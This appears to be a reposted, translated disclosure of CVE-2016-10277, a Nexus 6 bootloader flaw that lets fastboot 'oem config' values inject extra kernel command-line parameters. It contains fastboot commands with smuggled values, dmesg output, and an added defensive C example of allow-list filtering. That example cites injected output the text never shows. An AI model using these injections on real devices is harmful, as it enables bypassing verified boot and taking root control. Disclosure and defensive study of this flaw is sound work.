myhack58 MYHACK58:62201786520
History: May 28, 2017 - 12:00 a.m.

Bypassing Nexus 6 secure boot through kernel command-line injection (vulnerability alert, myhack58 / the black bar safety net)

2017-05-28 00:00:00
www.myhack58.com

CVSS3: 7.8 High (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Attack Vector: LOCAL; Attack Complexity: LOW; Privileges Required: NONE; User Interaction: REQUIRED; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH

CVSS2: 9.3 High (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Access Vector: NETWORK; Access Complexity: MEDIUM; Authentication: NONE; Confidentiality Impact: COMPLETE; Integrity Impact: COMPLETE; Availability Impact: COMPLETE

EPSS: 0.002 Low (Percentile: 55.0%)

In the May 2017 Android security bulletin, Google released a security patch for a serious vulnerability discovered in the Nexus 6 bootloader, CVE-2016-10277.
By exploiting this vulnerability, a physical attacker, or a user who already has ADB/fastboot USB access to a target device with a locked bootloader (for example, malware on a developer's host that waits for a device with ADB permissions to be connected over USB), can break the device's secure/verified boot mechanism. By loading a carefully constructed malicious initramfs image, the attacker obtains root access on the target device and complete control of its user space, from which further attacks can be carried out. In addition, the exploitation process does not restore the device to factory settings, so user data remains in place and still encrypted. Note that the demonstration is not an attack that works without preconditions.
During the vulnerability research we also found an 18-year-old Linux kernel vulnerability, CVE-2017-1000363; it does not affect the Nexus 6 and therefore probably does not affect any Android device.

1. Foreword
In January 2017 we disclosed a high-severity vulnerability, CVE-2016-8467, in the Nexus 6/6P that allowed an attacker to change the device's boot mode and thereby gain access to hidden USB interfaces of the device. The vulnerability was triggered through fastboot commands such as fastboot oem config bootmode bp-tools, which made the bootloader change the androidboot.mode parameter on the kernel command line. Google fixed it by hardening the bootloader: once the bootloader is locked, it no longer supports booting with a custom boot mode.
2. Vulnerability analysis: the kernel command injection vulnerability (CVE-2016-10277)
The Nexus 6 bootloader has many parameters, some of which can be controlled through the fastboot interface even when the bootloader is locked:
$ fastboot oem config
[…]
(bootloader)
(bootloader) Battery detection control
(bootloader) ("meter_lock" or "no_eprom")
(bootloader)
(bootloader) To force certain bootmode
(bootloader) (valid values are "fastboot", "factory", "bp-tools", "q
(bootloader) com", and "on-device-diag")
(bootloader)
(bootloader) Carrier IDs, see http://goo.gl/lojLh3
(bootloader)
(bootloader) Config the kernel console log
(bootloader) enable|true - enable with default settings
(bootloader) disable|false - disable
(bootloader) - enable with customized settings
(bootloader) (e.g.: "ttyHSL0", "ttyHSL0,230400,n8")
(bootloader)
(bootloader) FSG IDs, see http://goo.gl/gPmhU
(bootloader)
OKAY [ 0.048 s]
finished. total time: 0.048 s
The fsg-id, carrier and console parameters can hold arbitrary values (although their length is limited), and all three are eventually passed to the kernel command line. The vulnerability can be verified with the following commands:
$ fastboot oem config console foo
$ fastboot oem config fsg-id bar
$ fastboot oem config carrier baz
Then check the kernel command-line:
shamu:/ $ dmesg | grep command
[ 0.000000] Kernel command line: console=foo,115200,n8 earlyprintk
androidboot.console=foo androidboot.hardware=shamu msm_rtb.filter=0x37
ehci-hcd.park=3 utags.blkdev=/dev/block/platform/msm_sdcc.1/by-name/utags
utags.backup=/dev/block/platform/msm_sdcc.1/by-name/utagsBackup coherent_pool=8M
vmalloc=300M buildvariant=user androidboot.bootdevice=msm_sdcc.1 androidboot.serialno=ZX1G427V97
androidboot.baseband=mdm androidboot.version-baseband=D4.01-9625-05.45+FSG-9625-02.117
androidboot.mode=normal androidboot.device=shamu androidboot.hwrev=0x83A0
androidboot.radio=0x7 androidboot.powerup_reason=0x00004000 androidboot.bootreason=reboot
androidboot.write_protect=0 restart.download_mode=0 androidboot.fsg-id=bar
androidboot.secure_hardware=1 androidboot.cid=0xDE androidboot.wifimacaddr=F8:CF:C5:9F:8F:EB
androidboot.btmacaddr=F8:CF:C5:9F:8F:EA mdss_mdp.panel=1:dsi:0:qcom,mdss_dsi_mot_smd_596_QHD_dualmipi0_cmd_v0
androidboot.bootloader=moto-apq8084-72.02 androidboot.carrier=baz androidboot.hard
Now, if the bootloader does not filter these parameters, we should be able to inject arbitrary kernel command-line parameters:
$ fastboot oem config console "a androidboot.foo=0"
$ fastboot oem config fsg-id "a androidboot.bar=1"
$ fastboot oem config carrier "a androidboot.baz=2"
And indeed it works:
shamu:/ $ dmesg | grep command
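To make the injection concrete from the defender's side, here is an added example (not code from the article, the Nexus 6 bootloader or the kernel) that models how a bootloader concatenates an oem config value into the kernel command line, shows why the value "a androidboot.foo=0" is seen by the kernel as two parameters, and contrasts that with an allow-list check the bootloader could apply before appending the value. The function names and the allow-list are hypothetical.

```c
/* Added example (hypothetical names): a bootloader appending a fastboot
 * "oem config" value to the kernel command line, with and without filtering. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical allow-list: letters, digits and "._,:-" only. Whitespace and
 * quotes are rejected because the kernel splits the command line on spaces
 * and honours double quotes while parsing it. */
static int value_is_safe(const char *v)
{
    for (; *v; v++)
        if (!isalnum((unsigned char)*v) && strchr("._,:-", *v) == NULL)
            return 0;
    return 1;
}

/* Append "key=value " to buf; returns bytes written, or -1 on overflow. */
static int append_param(char *buf, size_t cap, const char *key, const char *value)
{
    size_t used = strlen(buf);
    int n = snprintf(buf + used, cap - used, "%s=%s ", key, value);
    return (n < 0 || (size_t)n >= cap - used) ? -1 : n;
}

/* Number of parameters the kernel would see: it splits on whitespace. */
static int count_params(const char *cmdline)
{
    int count = 0, in_token = 0;
    for (; *cmdline; cmdline++) {
        if (isspace((unsigned char)*cmdline)) in_token = 0;
        else if (!in_token) { in_token = 1; count++; }
    }
    return count;
}

/* filter=0 behaves like the vulnerable bootloader (value copied verbatim);
 * filter=1 applies the allow-list first and refuses unsafe values. */
static int build_console_param(char *buf, size_t cap, const char *console, int filter)
{
    buf[0] = '\0';
    if (filter && !value_is_safe(console)) return -1;
    return append_param(buf, cap, "androidboot.console", console);
}

int main(void)
{
    char cmd[256];
    const char *payload = "a androidboot.foo=0"; /* the value used in the article */
    build_console_param(cmd, sizeof cmd, payload, 0);
    printf("unfiltered: \"%s\" -> %d kernel params\n", cmd, count_params(cmd));
    printf("filtered: %s\n", build_console_param(cmd, sizeof cmd, payload, 1) < 0 ? "rejected" : "accepted");
    return 0;
}
```

The same check applies to the fsg-id and carrier parameters; in the unfiltered case the space inside the value turns one parameter into two, which is exactly what the dmesg output above shows.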

